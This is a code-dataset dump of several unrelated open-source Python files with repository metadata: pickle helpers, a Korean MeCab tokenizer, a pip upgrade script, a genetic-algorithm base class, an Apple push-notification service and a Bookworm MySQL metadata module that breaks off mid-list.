] | 9 | 2020-01-04T09:09:01.000Z | 2022-01-17T08:56:23.000Z | # -*- coding: utf-8 -*-
# Author: XuMing <xuming624@qq.com>
# Brief:
import os
import pickle
def load_pkl(pkl_path):
"""
加载词典文件
:param pkl_path:
:return:
"""
with open(pkl_path, 'rb') as f:
result = pickle.load(f)
return result
def dump_pkl(vocab, pkl_path, overwrite=True):
"""
存储文件
:param pkl_path:
:param overwrite:
:return:
"""
if os.path.exists(pkl_path) and not overwrite:
return
with open(pkl_path, 'wb') as f:
# pickle.dump(vocab, f, protocol=pickle.HIGHEST_PROTOCOL)
pickle.dump(vocab, f, protocol=0)
| 19.580645 | 65 | 0.599671 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 284 | 0.452951 |
eac4092c3274f3888ffd4211164c3fe9025a7e49 | 5,839 | py | Python | chat_service/mecab_service/mecab_ner_app/app/application/service/mecab_parser.py | YoungchanChang/ES_BERT_CHAT | 5dd919d3ba559ca9171ca73bd9e1052734f3060e | [
"Apache-2.0"
] | 1 | 2022-02-13T03:09:23.000Z | 2022-02-13T03:09:23.000Z | chat_service/mecab_service/mecab_ner_app/app/application/service/mecab_parser.py | YoungchanChang/ES_BERT_CHAT | 5dd919d3ba559ca9171ca73bd9e1052734f3060e | [
"Apache-2.0"
] | null | null | null | chat_service/mecab_service/mecab_ner_app/app/application/service/mecab_parser.py | YoungchanChang/ES_BERT_CHAT | 5dd919d3ba559ca9171ca73bd9e1052734f3060e | [
"Apache-2.0"
] | 1 | 2022-02-13T03:09:23.000Z | 2022-02-13T03:09:23.000Z | import copy
import _mecab
from collections import namedtuple
from typing import Generator
from mecab import MeCabError
from domain.mecab_domain import MecabWordFeature
def delete_pattern_from_string(string, pattern, index, nofail=False):
""" 문자열에서 패턴을 찾아서 *로 변환해주는 기능 """
# raise an error if index is outside of the string
if not nofail and index not in range(len(string)):
raise ValueError("index outside given string")
# if not erroring, but the index is still not in the correct range..
if index < 0: # add it to the beginning
return pattern + string
if index > len(string): # add it to the end
return string + pattern
len_pattern = len(pattern)
blank_pattern = len(pattern) * "*"
# insert the new string between "slices" of the original
return string[:index] + blank_pattern + string[index + len_pattern:]
STRING_NOT_FOUND = -1
Feature = namedtuple('Feature', [
'pos',
'semantic',
'has_jongseong',
'reading',
'type',
'start_pos',
'end_pos',
'expression',
])
def _create_lattice(sentence):
lattice = _mecab.Lattice()
lattice.add_request_type(_mecab.MECAB_ALLOCATE_SENTENCE) # Required
lattice.set_sentence(sentence)
return lattice
def _get_mecab_feature(node) -> MecabWordFeature:
# Reference:
# - http://taku910.github.io/mecab/learn.html
# - https://docs.google.com/spreadsheets/d/1-9blXKjtjeKZqsf4NzHeYJCrr49-nXeRF6D80udfcwY
# - https://bitbucket.org/eunjeon/mecab-ko-dic/src/master/utils/dictionary/lexicon.py
# feature = <pos>,<semantic>,<has_jongseong>,<reading>,<type>,<start_pos>,<end_pos>,<expression>
values = node.feature.split(',')
assert len(values) == 8
values = [value if value != '*' else None for value in values]
feature = dict(zip(Feature._fields, values))
feature['has_jongseong'] = {'T': True, 'F': False}.get(feature['has_jongseong'])
return MecabWordFeature(node.surface, **feature)
class MecabParser:
"""
문장을 형태소 분석하는 클래스.
형태소 분석시 형태소 분석 토큰, 스페이스 분석 토큰의 인덱스 위치도 함께 저장
"""
FIRST_WORD = 0
type_list = ["Compound", "Inflect"]
def __init__(self, sentence: str, dicpath=''):
argument = ''
if dicpath != '':
argument = '-d %s' % dicpath
self.tagger = _mecab.Tagger(argument)
self.sentence = sentence
self.sentence_token = self.sentence.split()
def _get_space_token_idx(self, mecab_word_feature: MecabWordFeature) -> int:
"""
스페이스로 토큰 분석한 인덱스 값 반환
:param mecab_word_feature: 메캅 단어 특성데이터
:return: 스페이스 토큰 분석한 결과
"""
for idx_token, sentence_token_item in enumerate(self.sentence_token):
index_string = sentence_token_item.find(mecab_word_feature.word)
if index_string != STRING_NOT_FOUND:
self.sentence_token[idx_token] = delete_pattern_from_string(sentence_token_item, mecab_word_feature.word, index_string)
return idx_token
return False
def gen_mecab_token_feature(self) -> Generator:
"""
메캅으로 형태소 분석한 토큰 제너레이터로 반환
스페이스로 분석한 토큰의 정보와 형태소로 분석한 토큰의 정보 포함
"""
lattice = _create_lattice(self.sentence)
if not self.tagger.parse(lattice):
raise MeCabError(self.tagger.what())
for mecab_token_idx, mecab_token in enumerate(lattice):
mecab_token_feature = _get_mecab_feature(mecab_token)
mecab_token_feature.mecab_token_idx = mecab_token_idx
space_token_idx = self._get_space_token_idx(mecab_token_feature)
if space_token_idx is not False:
mecab_token_feature.space_token_idx = space_token_idx
mecab_token_feature.word = mecab_token_feature.word.lower()
yield mecab_token_feature
def tokenize_mecab_compound(self) -> Generator:
"""
메캅으로 분석한 토큰 제너레이터로 반환 결과 중에 복합여, 굴절형태소 있는 경우 토큰화
"""
for compound_include_item in self.gen_mecab_token_feature():
if compound_include_item.type in self.type_list:
compound_item_list = compound_include_item.expression.split("+")
for compound_item in compound_item_list:
word, pos_tag, _ = compound_item.split("/")
copy_compound_include_item = copy.deepcopy(compound_include_item)
copy_compound_include_item.word = word
yield word, copy_compound_include_item
else:
yield compound_include_item.word, compound_include_item
def gen_mecab_compound_token_feature(self) -> Generator:
"""
:return: 복합어를 분해한 메캅 토큰 순서가 들어간 단어
"""
for idx, x in enumerate(list(self.tokenize_mecab_compound())):
copy_x = copy.deepcopy(x)
copy_x[1].mecab_token_compound_idx = idx
yield copy_x
def get_word_from_mecab_compound(self, is_list=False):
"""
메캅으로 분해된 문장에서 단어만 추출
:param is_list: 리스트로 반환 여부
:return: 메캅으로 분해된 문장에서 단어만 포함된 문장
"""
if is_list:
return [x[self.FIRST_WORD] for x in list(self.gen_mecab_compound_token_feature())]
return " ".join([x[self.FIRST_WORD] for x in list(self.gen_mecab_compound_token_feature())])
if __name__ == "__main__":
test_sentence = "나는 서울대병원에 갔어"
mecab_parse_results = list(
MecabParser(test_sentence).gen_mecab_token_feature())
for idx, mecab_parse_item in enumerate(mecab_parse_results):
print(mecab_parse_item)
mecab_parse_results = list(
MecabParser(test_sentence).gen_mecab_compound_token_feature())
for idx, mecab_parse_item in enumerate(mecab_parse_results):
print(mecab_parse_item) | 30.89418 | 135 | 0.651995 | 3,810 | 0.599906 | 2,080 | 0.327507 | 0 | 0 | 0 | 0 | 1,874 | 0.295072 |
eac468dad9691c91dffb6abb70d8d6fdcf16423a | 206 | py | Python | linux/.local/scripts/update_pip_pkgs.py | rodrigoestevao/configuration-files | b2517da7654005db1884973d7ced2cb1cc72feac | [
"MIT"
] | null | null | null | linux/.local/scripts/update_pip_pkgs.py | rodrigoestevao/configuration-files | b2517da7654005db1884973d7ced2cb1cc72feac | [
"MIT"
] | null | null | null | linux/.local/scripts/update_pip_pkgs.py | rodrigoestevao/configuration-files | b2517da7654005db1884973d7ced2cb1cc72feac | [
"MIT"
] | null | null | null | import pkg_resources
from subprocess import call
packages = [dist.project_name for dist in pkg_resources.working_set]
call(
f"pip install --upgrade --no-cache-dir {' '.join(packages)}", shell=True
)
| 20.6 | 76 | 0.742718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 60 | 0.291262 |
eac49b50576a3ac373bc861cf088d4e821e40708 | 385 | py | Python | yaga_ga/evolutionary_algorithm/operators/single_individual/base.py | alessandrolenzi/yaga | 872503ad04a2831135143750bc309188e5685284 | [
"MIT"
] | null | null | null | yaga_ga/evolutionary_algorithm/operators/single_individual/base.py | alessandrolenzi/yaga | 872503ad04a2831135143750bc309188e5685284 | [
"MIT"
] | null | null | null | yaga_ga/evolutionary_algorithm/operators/single_individual/base.py | alessandrolenzi/yaga | 872503ad04a2831135143750bc309188e5685284 | [
"MIT"
] | null | null | null | from abc import abstractmethod
from typing import TypeVar
from yaga_ga.evolutionary_algorithm.operators.base import GeneticOperator
IndividualType = TypeVar("IndividualType")
GeneType = TypeVar("GeneType")
class SingleIndividualOperator(GeneticOperator[IndividualType, GeneType]):
@abstractmethod
def __call__(self, _parent1: IndividualType) -> IndividualType:
...
| 27.5 | 74 | 0.794805 | 174 | 0.451948 | 0 | 0 | 95 | 0.246753 | 0 | 0 | 26 | 0.067532 |
eac5a5ec7e6cccad032db49002c1fac937db1360 | 7,746 | py | Python | pulsus/services/apns/service.py | pennersr/pulsus | ace014ca40e3928b235e1bcfebe22301c7f3cafe | [
"MIT"
] | 14 | 2015-01-16T07:48:43.000Z | 2019-04-19T23:13:50.000Z | pulsus/services/apns/service.py | pennersr/pulsus | ace014ca40e3928b235e1bcfebe22301c7f3cafe | [
"MIT"
] | null | null | null | pulsus/services/apns/service.py | pennersr/pulsus | ace014ca40e3928b235e1bcfebe22301c7f3cafe | [
"MIT"
] | 2 | 2015-08-06T12:52:56.000Z | 2019-02-07T18:09:23.000Z | import logging
import os
import struct
import binascii
import gevent
from gevent import socket, ssl
from gevent.event import Event
from gevent.queue import Queue
from ..base.service import BaseService
from .notification import APNSNotification
INITIAL_TIMEOUT = 5
MAX_TIMEOUT = 600
logger = logging.getLogger(__name__)
class APNSService(BaseService):
service_type = 'apns'
def __init__(self, sandbox=True, **kwargs):
self._send_queue = Queue()
self._send_queue_cleared = Event()
self._send_greenlet = None
self.timeout = INITIAL_TIMEOUT
self._feedback_queue = Queue()
if "certfile" not in kwargs:
raise ValueError(u"Must specify a PEM bundle.")
if not os.path.exists(kwargs['certfile']):
raise ValueError('PEM bundle file not found')
self._sslargs = kwargs
self._push_connection = None
self._sandbox = sandbox
self._error_queue = Queue()
self._send_greenlet = None
self._error_greenlet = None
self._feedback_connection = None
self._feedback_greenlet = None
self.last_err = None
def start(self):
"""Start the message sending loop."""
if self._send_greenlet is None:
self._send_greenlet = gevent.spawn(self.save_err, self._send_loop)
def _send_loop(self):
self._send_greenlet = gevent.getcurrent()
try:
logger.info("%s service started" % self.service_type)
while True:
message = self._send_queue.get()
try:
self.send_notification(message)
except Exception:
self.error_sending_notification(message)
else:
self.timeout = INITIAL_TIMEOUT
finally:
if self._send_queue.qsize() < 1 and \
not self._send_queue_cleared.is_set():
self._send_queue_cleared.set()
except gevent.GreenletExit:
pass
finally:
self._send_greenlet = None
logger.info("%s service stopped" % self.service_type)
def _check_send_connection(self):
if self._push_connection is None:
tcp_socket = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0)
s = ssl.wrap_socket(tcp_socket, ssl_version=ssl.PROTOCOL_TLSv1,
**self._sslargs)
addr = ["gateway.push.apple.com", 2195]
if self._sandbox:
addr[0] = "gateway.sandbox.push.apple.com"
logger.debug('Connecting to %s' % addr[0])
s.connect_ex(tuple(addr))
self._push_connection = s
self._error_greenlet = gevent.spawn(self.save_err,
self._error_loop)
def _check_feedback_connection(self):
if self._feedback_connection is None:
tcp_socket = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0)
s = ssl.wrap_socket(tcp_socket, ssl_version=ssl.PROTOCOL_TLSv1,
**self._sslargs)
addr = ["feedback.push.apple.com", 2196]
if self._sandbox:
addr[0] = "feedback.sandbox.push.apple.com"
logger.debug('Connecting to %s' % addr[0])
s.connect_ex(tuple(addr))
self._feedback_connection = s
def _error_loop(self):
self._error_greenlet = gevent.getcurrent()
try:
while True:
if self._push_connection is None:
break
msg = self._push_connection.recv(1 + 1 + 4)
if len(msg) < 6:
return
data = struct.unpack("!bbI", msg)
self._error_queue.put((data[1], data[2]))
except gevent.GreenletExit:
logger.exception('Error')
finally:
if self._push_connection is not None:
self._push_connection.close()
self._push_connection = None
self._error_greenlet = None
def _feedback_loop(self):
self._feedback_greenlet = gevent.getcurrent()
try:
self._check_feedback_connection()
while True:
msg = self._feedback_connection.recv(4 + 2 + 32)
if len(msg) < 38:
return
data = struct.unpack("!IH32s", msg)
token = binascii.b2a_hex(data[2]).decode('ascii')
self._feedback_queue.put((data[0], token))
except gevent.GreenletExit:
logger.exception('Error')
finally:
if self._feedback_connection:
self._feedback_connection.close()
self._feedback_connection = None
self._feedback_greenlet = None
def queue_notification(self, obj):
"""Send a push notification"""
if not isinstance(obj, APNSNotification):
raise ValueError(u"You can only send APNSNotification objects.")
self._send_queue.put(obj)
def get_error(self, block=True, timeout=None):
"""
Get the next error message.
Each error message is a 2-tuple of (status, identifier)."""
return self._error_queue.get(block=block, timeout=timeout)
def get_feedback(self, block=True, timeout=None):
"""
Get the next feedback message.
Each feedback message is a 2-tuple of (timestamp, device_token)."""
if self._feedback_greenlet is None:
self._feedback_greenlet = gevent.spawn(self.save_err,
self._feedback_loop)
return self._feedback_queue.get(
block=block,
timeout=timeout)
def stop(self, timeout=10.0):
"""
Send all pending messages, close connection.
Returns True if no message left to sent. False if dirty.
- timeout: seconds to wait for sending remaining messages. disconnect
immediately if None.
"""
if (self._send_greenlet is not None) and \
(self._send_queue.qsize() > 0):
self.wait_send(timeout=timeout)
if self._send_greenlet is not None:
gevent.kill(self._send_greenlet)
self._send_greenlet = None
if self._error_greenlet is not None:
gevent.kill(self._error_greenlet)
self._error_greenlet = None
if self._feedback_greenlet is not None:
gevent.kill(self._feedback_greenlet)
self._feedback_greenlet = None
return self._send_queue.qsize() < 1
def wait_send(self, timeout=None):
self._send_queue_cleared.clear()
return self._send_queue_cleared.wait(timeout=timeout)
def error_sending_notification(self, notification):
if self._push_connection is not None:
self._push_connection.close()
self._push_connection = None
logger.exception("Error while pushing")
self._send_queue.put(notification)
gevent.sleep(self.timeout)
# approaching Fibonacci series
timeout = int(round(float(self.timeout) * 1.6))
self.timeout = min(timeout, MAX_TIMEOUT)
def send_notification(self, notification):
self._check_send_connection()
logger.debug('Sending APNS notification')
self._push_connection.send(notification.pack())
def save_err(self, func, *args, **kwargs):
try:
func(*args, **kwargs)
except Exception as e:
self.last_err = e
raise
def get_last_error(self):
return self.last_err
| 35.369863 | 78 | 0.587529 | 7,418 | 0.957656 | 0 | 0 | 0 | 0 | 0 | 0 | 968 | 0.124968 |
eac64b9c80cf64eae73e29632228de6d1a1f6dce | 36,295 | py | Python | bookworm/variableSet.py | organisciak/HTRC-BookwormDB | bc24080d6443f8da38255e19149431c9e5b182ab | [
"MIT"
] | null | null | null | bookworm/variableSet.py | organisciak/HTRC-BookwormDB | bc24080d6443f8da38255e19149431c9e5b182ab | [
"MIT"
] | null | null | null | bookworm/variableSet.py | organisciak/HTRC-BookwormDB | bc24080d6443f8da38255e19149431c9e5b182ab | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
import warnings
import json
import os
import decimal
import re
from MySQLdb import escape_string
def to_unicode(obj, encoding='utf-8'):
if isinstance(obj, basestring):
if not isinstance(obj, unicode):
obj = unicode(obj, encoding)
if isinstance(obj, int) or isinstance(obj, float) or isinstance(obj, decimal.Decimal):
obj = unicode(str(obj), encoding)
return obj
def splitMySQLcode(string):
"""
MySQL code can only be executed one command at a time, and fails if it has any empty slots
So as a convenience wrapper, I'm just splitting it and returning an array.
"""
try:
output = ['%s;\n' % query for query in string.split(';') if re.search(r"\w", query)]
except AttributeError:
#Occurs when the field is completely empty
output = []
return output
class textids(dict):
"""
This class is a dictionary that maps file-locations (which can be many characters long)
to bookids (which are 3-byte integers).
It's critically important to keep the already-existing data valid;
so it doesn't overwrite the
old stuff, instead it makes sure this python dictionary is always aligned with
the text files on
disk. As a result, additions to it always have to be made through the 'bump'
method rather than
ordinary assignment (since I, Ben, didn't know how to reset the default hash
assignment to include
this): and it has to be closed at the end to ensure the file is up-to-date at the end.
Create a dictionary, and initialize it with all the bookids we already have.
And make it so that any new entries are also written to disk, so that they are kept permanently.
"""
def __init__(self):
try:
subprocess.call(['mkdir','files/texts/textids'])
except:
pass
filelists = os.listdir("files/texts/textids")
numbers = [0]
for filelist in filelists:
for line in open("files/texts/textids/%s" % filelist):
parts = line.replace('\n', '').split("\t")
self[parts[1]] = int(parts[0])
numbers.append(int(parts[0]))
self.new = open('files/texts/textids/new', 'a')
self.max = max(numbers)
def bump(self,newFileName):
self.max = self.max + 1
writing = self.new
writing.write('%s\t%s\n' % (str(self.max), newFileName.encode('utf-8')))
self[newFileName] = self.max
return self.max
def close(self):
self.new.close()
def guessBasedOnNameAndContents(metadataname,dictionary):
"""
This makes a guess based on the data field's name and type.
CUrrently it assumes everything is categorical; that can really chunk out on some text fields, but works much better for importing csvs. Probably we want to take some other things into account as well.
"""
description = {"field":metadataname,"datatype":"categorical","type":"character","unique":True}
example = dictionary.keys()[0]
if type(example)==int:
description["type"] = "integer"
if type(example)==list:
unique(example)==False
if metadataname == "searchstring":
return {"datatype": "searchstring", "field": "searchstring", "unique": True, "type": "text"}
if re.search("date",metadataname) or re.search("time",metadataname):
description["datatype"] = "time"
values = [dictionary[key] for key in dictionary]
averageNumberOfEntries = sum(values)/len(values)
maxEntries = max(values)
if averageNumberOfEntries > 2:
description["datatype"] = "categorical"
return description
class dataField:
"""
This define a class that supports a data field from a json definition.
We'll use this to spit out appropriate sql code and JSON where needed.
The 'definition' here means the user-generated array (submitted in json but
parsed out before this) described in the Bookworm interface.
This knows whether it's unique, whether it should treat itself as a date, etc.
The complicated bits are about allowing fast lookups for arbitrary-length
character lookups: for a variable like "country," it will also create
the new field "country__id" and the table "countryLookup" to allow
faster joins on the main database
"""
def __init__(self, definition, dbToPutIn, anchorType="MEDIUMINT UNSIGNED", anchor="bookid",table="catalog",fasttab="fastcat"):
#anchorType should be derived from somewhere.
self.anchorType = anchorType
self.anchor = anchor
for key in definition.iterkeys():
vars(self)[key] = definition[key]
self.dbToPutIn = dbToPutIn
#ordinarily, a column has no alias other than itself.
self.alias = self.field
self.status = "hidden"
#The table it's stored in will be either 'catalog', or a new
#table named after the variable. For now, at least. (later the anchor should get used).
self.fastField = self.field
self.finalTable = fasttab
if self.datatype == "categorical":
self.type = "character"
#This will catch a common sort of mistake (calling it text),
#but also coerce any categorical data to have fewer than 255 characters.
#This is worth it b/c a more than 255-character field will take *forever* to build.
self.fastField = "%s__id" % self.field
self.alias = self.fastField
#If it's a categorical variable, it will be found in a lookup table.
self.finalTable = self.field + "Lookup"
self.status = "public"
if self.datatype == "time":
self.status = "public"
if self.unique:
self.table = table
self.fasttab = fasttab
else:
self.table = self.field + "Disk"
self.fasttab = self.field + "heap"
self.outputloc = "files/metadata/%s.txt" % self.field
def slowSQL(self, withIndex=False):
"""
This returns something like "author VARCHAR(255)",
a small definition string with an index, potentially.
"""
mysqltypes = {
"character": "VARCHAR(255)",
"integer": "INT",
"text": "VARCHAR(5000)",
"decimal": "DECIMAL (9,4)"
}
# Indexing both the field and against the anchor for fast memory table creation.
indexstring = ", INDEX (%(field)s), INDEX (%(anchor)s, %(field)s " % self.__dict__
#need to specify fixed prefix length on text strings: (http://dev.mysql.com/doc/refman/5.0/en/create-index.html)
# If it's a text field, we need to curtail the index at 255 characters
# or else indexes start timing out or eating up all the memory.
indextypes = {
"character": "%s)" % indexstring,
"integer": "%s)" % indexstring,
"text": "%s (255) )" % indexstring,
"decimal": "%s)" % indexstring
}
createstring = " %s %s" % (self.field, mysqltypes[self.type])
if withIndex and self.type != 'text':
return '%s%s' % (createstring, indextypes[self.type])
return createstring
def fastSQL(self):
"""
This creates code to go in a memory table: it assumes that the disk
tables are already there, and that a connection cursor is active.
Memory tables in MySQL don't suppor the VARCHAR (they just take up all
255 characters or whatever); thus, it has to be stored this other way.
"""
if self.datatype != 'etc':
if self.type == "character":
self.setIntType()
return " %(field)s__id %(intType)s" % self.__dict__
if self.type == "integer":
return " %s INT" % self.field
if self.type == "decimal":
return " %s DECIMAL (9,4) " % self.field
else:
return None
else:
return None
def buildDiskTable(self,fileLocation="default"):
"""
Builds a disk table for a nonunique variable.
"""
db = self.dbToPutIn
dfield = self;
if fileLocation == "default":
fileLocation = "files/metadata/" + dfield.field + ".txt"
print "Making a SQL table to hold the data for " + dfield.field
q1 = """DROP TABLE IF EXISTS """ + dfield.field + "Disk"
db.query(q1)
db.query("""CREATE TABLE IF NOT EXISTS """ + dfield.field + """Disk (
""" + self.anchor + " " + self.anchorType + """,
""" + dfield.slowSQL(withIndex=True) + """
);""")
db.query("ALTER TABLE " + dfield.field + "Disk DISABLE KEYS;")
loadcode = """LOAD DATA LOCAL INFILE '""" + fileLocation + """'
INTO TABLE """ + dfield.field + """Disk
FIELDS ESCAPED BY '';"""
db.query(loadcode)
#cursor = db.query("""SELECT count(*) FROM """ + dfield.field + """Disk""")
db.query("ALTER TABLE " + dfield.field + "Disk ENABLE KEYS")
def buildIDTable(self):
IDcode = self.buildIdTable()
for query in splitMySQLcode(IDcode):
self.dbToPutIn.query(query)
def buildLookupTable(self):
dfield = self;
lookupCode = dfield.buildIdTable();
lookupCode = lookupCode + dfield.fastSQLTable()
for query in splitMySQLcode(lookupCode):
dfield.dbToPutIn.query(query)
def fastLookupTableIfNecessary(self, engine="MEMORY"):
"""
This uses the already-created ID table to create a memory lookup.
"""
self.engine = engine
if self.datatype == 'categorical':
self.setIntType()
self.maxlength = self.dbToPutIn.query("SELECT MAX(CHAR_LENGTH(%(field)s)) FROM %(field)s__id" % self.__dict__)
self.maxlength = self.maxlength.fetchall()[0][0]
self.maxlength = max([self.maxlength,1])
return("""DROP TABLE IF EXISTS tmp;
CREATE TABLE tmp (%(field)s__id %(intType)s ,PRIMARY KEY (%(field)s__id),
%(field)s VARCHAR (%(maxlength)s) ) ENGINE=%(engine)s
SELECT %(field)s__id,%(field)s FROM %(field)s__id;
DROP TABLE IF EXISTS %(field)sLookup;
RENAME TABLE tmp to %(field)sLookup;
""" % self.__dict__)
return ""
def fastSQLTable(self,engine="MEMORY"):
#setting engine to another value will create these tables on disk.
returnt = ""
self.engine = engine
if self.unique and self.anchor=="bookid":
pass #when it has to be part of a larger set
if not self.unique and self.datatype == 'categorical':
self.setIntType()
returnt = returnt+"""## Creating the memory storage table for %(field)s
DROP TABLE IF EXISTS tmp;
CREATE TABLE tmp (%(anchor)s %(anchorType)s , INDEX (%(anchor)s),%(field)s__id %(intType)s ) ENGINE=%(engine)s;
INSERT INTO tmp SELECT %(anchor)s ,%(field)s__id FROM %(field)s__id JOIN %(field)sDisk USING (%(field)s);
DROP TABLE IF EXISTS %(field)sheap;
RENAME TABLE tmp TO %(field)sheap;
""" % self.__dict__
if self.datatype == 'categorical' and self.unique:
pass
return returnt
def jsonDict(self):
"""
DEPRECATED!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#This builds a JSON dictionary that can be loaded into outside
bookworm in the "options.json" file.
It's a bad design decision; newer version
just load this directly from the database.
"""
mydict = dict()
#It gets confusingly named: "type" is the key for real name ("time", "categorical" in the json), but also the mysql key ('character','integer') here. That would require renaming code in a couple places.
mydict['type'] = self.datatype
mydict['dbfield'] = self.field
try:
mydict['name'] = self.name
except:
mydict['name'] = self.field
if self.datatype == "etc" or self.type == "text":
return dict() #(Some things don't go into the fast settings because they'd take too long)
if self.datatype == "time":
mydict['unit'] = self.field
#default to the full min and max date ranges
#times may not be zero or negative
cursor = self.dbToPutIn.query("SELECT MIN(" + self.field + "), MAX(" + self.field + ") FROM catalog WHERE " + self.field + " > 0 ")
results = cursor.fetchall()[0]
mydict['range'] = [results[0], results[1]]
mydict['initial'] = [results[0], results[1]]
if self.datatype == "categorical":
mydict['dbfield'] = self.field + "__id"
#Find all the variables used more than 20 times from the database, and build them into something json-usable.
cursor = self.dbToPutIn.query("SELECT %(field)s, %(field)s__id FROM %(field)s__id WHERE %(field)s__count > 20 ORDER BY %(field)s__id ASC LIMIT 500;" % self.__dict__)
sort_order = []
descriptions = dict()
for row in cursor.fetchall():
code = row[1]
name = row[0]
code = to_unicode(code)
sort_order.append(code)
descriptions[code] = dict()
"""
These three things all have slightly different meanings:
the english name, the database code for that name, and the short display name to show.
It would be worth allowing lookup files for these: for now, they are what they are and can be further improved by hand.
"""
descriptions[code]["dbcode"] = code
descriptions[code]["name"] = name
descriptions[code]["shortname"] = name
mydict["categorical"] = {"descriptions": descriptions, "sort_order": sort_order}
return mydict
def setIntType(self):
try:
alreadyExists = self.intType
except AttributeError:
cursor = self.dbToPutIn.query("SELECT count(DISTINCT "+ self.field + ") FROM " + self.table)
self.nCategories = cursor.fetchall()[0][0]
self.intType = "INT UNSIGNED"
if self.nCategories <= 16777215:
self.intType = "MEDIUMINT UNSIGNED"
if self.nCategories <= 65535:
self.intType = "SMALLINT UNSIGNED"
if self.nCategories <= 255:
self.intType = "TINYINT UNSIGNED"
def buildIdTable(self):
"""
This builds an integer crosswalk ID table with a field that stores categorical
information in the fewest number of bytes. This is important because it can take
significant amounts of time to group across categories if they are large:
for example, with 4 million newspaper articles, on one server a GROUP BY with
a 12-byte VARCHAR field takes 5.5 seconds, but a GROUP BY with a 3-byte MEDIUMINT
field corresponding exactly to that takes 2.2 seconds on the exact same data.
That sort of query is included in every single bookworm
search multiple times, so it's necessary to optimize. Plus, it means we can save space on memory storage
in important ways as well.
"""
#First, figure out how long the ID table has to be and make that into a datatype.
#Joins and groups are slower the larger the field grouping on, so this is worth optimizing.
self.setIntType()
returnt = "DROP TABLE IF EXISTS tmp;\n\n"
returnt += "CREATE TABLE tmp ENGINE=MYISAM SELECT %(field)s,count(*) as count FROM %(table)s GROUP BY %(field)s;\n\n" % self.__dict__
returnt += """CREATE TABLE IF NOT EXISTS %(field)s__id (
%(field)s__id %(intType)s PRIMARY KEY AUTO_INCREMENT,
%(field)s VARCHAR (255), INDEX (%(field)s), %(field)s__count MEDIUMINT);\n\n""" % self.__dict__
returnt += """INSERT INTO %(field)s__id (%(field)s,%(field)s__count)
SELECT %(field)s,count FROM tmp LEFT JOIN %(field)s__id USING (%(field)s) WHERE %(field)s__id.%(field)s__id IS NULL
ORDER BY count DESC;\n\n""" % self.__dict__
returnt += """DROP TABLE tmp;\n\n"""
self.idCode = "%s__id" % self.field
return returnt
def updateVariableDescriptionTable(self):
self.memoryCode = self.fastLookupTableIfNecessary()
code = """INSERT IGNORE INTO masterVariableTable
(dbname, name, type, tablename, anchor, alias, status,description)
VALUES
('%(field)s','%(field)s','%(type)s','%(finalTable)s','%(anchor)s','%(alias)s','%(status)s','') """ % self.__dict__
self.dbToPutIn.query(code)
if not self.unique:
code = self.fastSQLTable()
try:
parentTab = self.dbToPutIn.query("""
SELECT tablename FROM masterVariableTable
WHERE dbname='%s'""" % self.fastAnchor).fetchall()[0][0]
except:
parentTab="fastcat"
self.dbToPutIn.query('DELETE FROM masterTableTable WHERE masterTableTable.tablename="%s";' %self.field + "heap")
self.dbToPutIn.query("INSERT IGNORE INTO masterTableTable VALUES ('%s','%s','%s')" % (self.field+"heap",parentTab,escape_string(code)))
if self.datatype=="categorical":
#Variable Info
code = """
INSERT IGNORE INTO masterVariableTable
(dbname, name, type, tablename,
anchor, alias, status,description)
VALUES
('%(field)s__id','%(field)s','lookup','%(fasttab)s',
'%(anchor)s','%(alias)s','hidden','') """ % self.__dict__
self.dbToPutIn.query(code)
#Separate Table Info
code = self.fastLookupTableIfNecessary()
self.dbToPutIn.query('DELETE FROM masterTableTable WHERE masterTableTable.tablename="%s";' %(self.field + "Lookup"))
self.dbToPutIn.query("INSERT IGNORE INTO masterTableTable VALUES ('%s','%s','%s')" % (self.field+"Lookup",self.fasttab,escape_string(code)))
mySQLreservedWords = set(["ACCESSIBLE", "ADD", "ALL", "ALTER", "ANALYZE", "AND", "AS", "ASC", "ASENSITIVE", "BEFORE", "BETWEEN", "BIGINT", "BINARY", "BLOB", "BOTH", "BY", "CALL", "CASCADE", "CASE", "CHANGE", "CHAR", "CHARACTER", "CHECK", "COLLATE", "COLUMN", "CONDITION", "CONSTRAINT", "CONTINUE", "CONVERT", "CREATE", "CROSS", "CURRENT_DATE", "CURRENT_TIME", "CURRENT_TIMESTAMP", "CURRENT_USER", "CURSOR", "DATABASE", "DATABASES", "DAY_HOUR", "DAY_MICROSECOND", "DAY_MINUTE", "DAY_SECOND", "DEC", "DECIMAL", "DECLARE", "DEFAULT", "DELAYED", "DELETE", "DESC", "DESCRIBE", "DETERMINISTIC", "DISTINCT", "DISTINCTROW", "DIV", "DOUBLE", "DROP", "DUAL", "EACH", "ELSE", "ELSEIF", "ENCLOSED", "ESCAPED", "EXISTS", "EXIT", "EXPLAIN", "FALSE", "FETCH", "FLOAT", "FLOAT4", "FLOAT8", "FOR", "FORCE", "FOREIGN", "FROM", "FULLTEXT", "GENERAL", "GRANT", "GROUP", "HAVING", "HIGH_PRIORITY", "HOUR_MICROSECOND", "HOUR_MINUTE", "HOUR_SECOND", "IF", "IGNORE", "IGNORE_SERVER_IDS", "IN", "INDEX", "INFILE", "INNER", "INOUT", "INSENSITIVE", "INSERT", "INT", "INT1", "INT2", "INT3", "INT4", "INT8", "INTEGER", "INTERVAL", "INTO", "IS", "ITERATE", "JOIN", "KEY", "KEYS", "KILL", "LEADING", "LEAVE", "LEFT", "LIKE", "LIMIT", "LINEAR", "LINES", "LOAD", "LOCALTIME", "LOCALTIMESTAMP", "LOCK", "LONG", "LONGBLOB", "LONGTEXT", "LOOP", "LOW_PRIORITY", "MASTER_HEARTBEAT_PERIOD[c]", "MASTER_SSL_VERIFY_SERVER_CERT", "MATCH", "MAXVALUE", "MEDIUMBLOB", "MEDIUMINT", "MEDIUMTEXT", "MIDDLEINT", "MINUTE_MICROSECOND", "MINUTE_SECOND", "MOD", "MODIFIES", "NATURAL", "NOT", "NO_WRITE_TO_BINLOG", "NULL", "NUMERIC", "ON", "OPTIMIZE", "OPTION", "OPTIONALLY", "OR", "ORDER", "OUT", "OUTER", "OUTFILE", "PRECISION", "PRIMARY", "PROCEDURE", "PURGE", "RANGE", "READ", "READS", "READ_WRITE", "REAL", "REFERENCES", "REGEXP", "RELEASE", "RENAME", "REPEAT", 